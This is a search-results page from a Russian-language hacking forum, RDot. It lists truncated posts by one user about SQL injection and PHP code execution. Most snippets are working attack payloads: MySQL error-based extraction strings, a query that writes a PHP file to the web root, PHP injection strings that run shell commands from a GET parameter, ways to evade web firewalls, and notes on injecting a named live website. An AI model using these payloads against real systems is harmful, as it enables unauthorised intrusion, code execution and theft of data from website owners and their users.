Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 46.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: spari
Раздел: Web-среда/Web-applications 07.03.2018, 15:28
Ответов: 38
Просмотров: 108,341
Автор spari
недавние находки о MySQL: 1) in sql, if we...

недавние находки о MySQL:

1)
in sql, if we try to select a column that appears in more than one table, we are getting an error.
SELECT a from (select 1 a)x join (select 2 a)y
Column 'a' in...
Раздел: Web-среда/Web-applications 15.07.2016, 20:21
Ответов: 38
Просмотров: 108,341
Автор spari
MariaDB маленький error-based трюк, с помощью...

MariaDB маленький error-based трюк, с помощью regex.
SELECT 1 rlike concat(1,0x5b);
Got error 'missing terminating ] for character class at offset 2' from regexp
the [] must be closed, when we...
Раздел: Статьи/Articles 11.05.2015, 11:40
Ответов: 8
Просмотров: 18,478
Автор spari
replace() have the same bug, when we combine...

replace() have the same bug, when we combine global variable with global variable / time function.
SELECT replace(@@version,5,@@version) FROM my_table; ...
Раздел: Web-среда/Web-applications 07.12.2014, 11:52
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
SELECT '<?phpinfo()?>' INTO OUTFILE...

SELECT '<?phpinfo()?>' INTO OUTFILE '/full/path/x.php';
Раздел: Web-среда/Web-applications 02.10.2014, 21:35
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
1,1 procedure...

1,1 procedure analyse(0,updatexml(1,concat(0xa,version()),1))#
Раздел: Статьи/Articles 30.09.2014, 11:23
Ответов: 4
Просмотров: 14,235
Автор spari
narrowing down a bit- since name_const() allow...

narrowing down a bit-
since name_const() allow us to give a numeric alias, we can use this simple trick-

mysql>SELECT polygon((select*from(select name_const(version(),1))x));
Error 1367 (22007):...
Раздел: Статьи/Articles 29.09.2014, 21:30
Ответов: 4
Просмотров: 14,235
Автор spari
other functions that works, than...

other functions that works, than GeometryCollection()-
linestring(), multipoint(), multilinestring() and multipolygon().
mysql>SELECT multipoint((select*from(select*from(select@@version)f)x));...
Раздел: Статьи/Articles 29.09.2014, 21:12
Ответов: 4
Просмотров: 14,235
Автор spari
Lightbulb MySQL: новый Geometric error-based

Привет!
я не говорю России, так что я собираюсь объяснить это на английском языке. ;)
earlier today, i got some spare time, and played a little with the function GeometryCollection()...
Раздел: Web-среда/Web-applications 07.09.2014, 11:21
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
table_name=0x67345f6175746831 not...

table_name=0x67345f6175746831 not 0x2767345f617574683127
Раздел: Web-среда/Web-applications 29.07.2013, 14:01
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you can just use substr() with...

you can just use substr() with group_concat(),like that-
...
Раздел: Web-среда/Web-applications 18.03.2013, 15:59
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
about pozdravleniy.net,the injection is here- ...

about pozdravleniy.net,the injection is here-
...FROM table WHERE OWER(email) = LOWER('injection')
so,close the tag first,and inject like regular postgresql injection-
email=')and...
Раздел: Web-среда/Web-applications 06.03.2013, 22:41
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you dont have to use quotes. if system() is...

you dont have to use quotes.
if system() is disabled,you can always use exec(),shell_exec(),passthru(),pcntl_exec() or include(expect://command).
if its also not working,you can use...
Раздел: Web-среда/Web-applications 06.03.2013, 15:59
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
how about name={${system($_GET[c])}}&c=id or ...

how about
name={${system($_GET[c])}}&c=id
or
name={${include(php://input)}}
and in POST-
<?system(id);?>
Раздел: Web-среда/Web-applications 28.02.2013, 16:27
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
sure. close the tag first,and then ignore the...

sure.
close the tag first,and then ignore the rest. just like string in sqli :)
concat(0x222f3e,version(),0x3c212d2d)
Раздел: Web-среда/Web-applications 28.02.2013, 16:23
Ответов: 11
Просмотров: 14,573
Автор spari
system($_GET[c]); passthru($_GET[c]); ...

system($_GET[c]);
passthru($_GET[c]);
exec($_GET[c]);
shell_exec($_GET[c]);

&c=ls -la
if there is a problem with "cannot execute a blank command",like you want it to be hidden,you can always...
Раздел: Web-среда/Web-applications 20.02.2013, 22:32
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you dont have to sort anything,you can see all...

you dont have to sort anything,you can see all the tables in the pictures. :)
http://i.imgur.com/hhobEEN.png
using this subquery:...
Раздел: Web-среда/Web-applications 20.02.2013, 12:20
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
as you can see,the injection is into...

as you can see,the injection is into ('%injection%'),so first,we need to close the injection.
')injection%23

now,when we try to inject,we are notice that we are not allowed to use space and...
Раздел: Web-среда/Web-applications 13.02.2013, 17:33
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you can use substring() and group_concat() and...

you can use substring() and group_concat() and bypass this error,like
http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select substring(group_concat(id,uname),1,150) from...
Раздел: Web-среда/Web-applications 07.02.2013, 16:00
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you can set a condition,and make the webserver...

you can set a condition,and make the webserver ignore the table.

information_schema.tables where table_name!="Del_Art"
and then the other table,
information_schema.tables where...
Раздел: Web-среда/Web-applications 04.02.2013, 15:16
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you can get the tables using extractvalue(),since...

you can get the tables using extractvalue(),since the version is bigger than 5.1
the waf blocks 'information_schema.tables' and there is whitespace,but you can bypass the waf like that-
...
Раздел: Web-среда/Web-applications 09.01.2013, 00:52
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
very nice :) you can also close the title tag...

very nice :)
you can also close the title tag and get the output the the screen-...
Раздел: Web-среда/Web-applications 08.01.2013, 18:57
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
sorry man,didnt noticed that.

sorry man,didnt noticed that.
Раздел: Web-среда/Web-applications 08.01.2013, 16:48
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
you cant,since in name_const you can execute only...

you cant,since in name_const you can execute only the version,if the version is not between 5.0.12 - 5.0.41
string&whitespace-...
Раздел: Web-среда/Web-applications 29.12.2012, 20:09
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
nikp,nice query :) but you can use union,since...

nikp,nice query :)
but you can use union,since the injection point not gets into this query
SELECT * FROM tool_staff_pdf WHERE pdf_staff_id = AND pdf_date_posted >= 1325264818 ORDER BY pdf_order...
Раздел: Web-среда/Web-applications 23.12.2012, 15:26
Ответов: 3,616
Просмотров: 1,920,441
Автор spari
the injection point is here- SELECT * FROM page...

the injection point is here-
SELECT * FROM page $injection WHERE columns=value
so we just have to add a where clause,and the injection goes normally.
...
Показано с 1 по 25 из 46.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot